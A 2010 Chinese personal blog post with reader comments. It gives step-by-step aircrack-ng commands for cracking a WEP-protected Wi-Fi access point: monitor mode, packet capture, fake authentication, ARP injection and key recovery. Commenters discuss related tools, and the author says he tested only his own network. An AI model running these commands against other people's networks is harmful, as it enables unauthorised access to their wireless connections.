简单记一下aircrack破解wep密码
大致思路
通过建立虚拟无线连接去与欲破解的AP建立连接并获取数据,再将获取的数据破解。(仅针对信号强度好的AP,信号弱的不现实。)
基本步骤
sudo su
使用root权限
install aircrack-ng安装aircrack-ng
airmon-ng start wlan-x
启动后会出现一个mon0的虚拟网卡
airodump-ng mon0
查看可用无线ap
airodump-ng -c no-of-channel --bssid ap-mac -w name-of-cap mon0
开始针对一个无线抓包
aireplay-ng -1 0 -a ap-mac -h wlan-mac mon0
与ap建立虚拟连接
aireplay-ng -2 -F -p 0841 -c FF:FF:FF:FF:FF:FF -b ap-mac -h wlan-mac mon0
开始注入
aircrack-ng name-of-cap
抓够5000data后破解,可能需要更多的data才能破解。
善后
破解完成后停掉aireplay-ng,不能用Ctrl+C或关闭终端窗口,只能kill掉;关掉mon0,否则会看到网速飞一般的假象。
貌似这种不能破无客户端的。
[回复]
pityonline 回复:
七月 4th, 2010 at 6:38 下午
@Gyteng, 我是拿自己的wifi测试的,没去破解别的人AP,呵呵……
[回复]
BT3里面有好多破解工具。。
[回复]
pityonline 回复:
七月 4th, 2010 at 6:43 下午
@Lavande, 用过BT4的live cd,但感觉太复杂,以当时的水平没搞定……
[回复]
[...] This post was mentioned on Twitter by Houge. Houge said: ♺ @pityonline: 博客更新: 简单记一下aircrack破解wep密码大致思路: 通过建立虚拟无线连接去与欲破解的AP建立连接并… (http://pityonline.info/?p=1090) [...]
[...] 通过建立虚拟无线连接去与欲破解的AP建立连接并… (http://pityonline.info/?p=1090) [...]
好的,等下做实验去。。
[回复]
我发现如果确定是wep加密的话,用wepspoon更方便。aircrack我只在windows下用过,囧
[回复]
pityonline 回复:
七月 24th, 2010 at 9:56 下午
wepspoon在ubuntu的源里没有的,还要自己编译,所以俺就直接捞现成的了…… :P
[回复]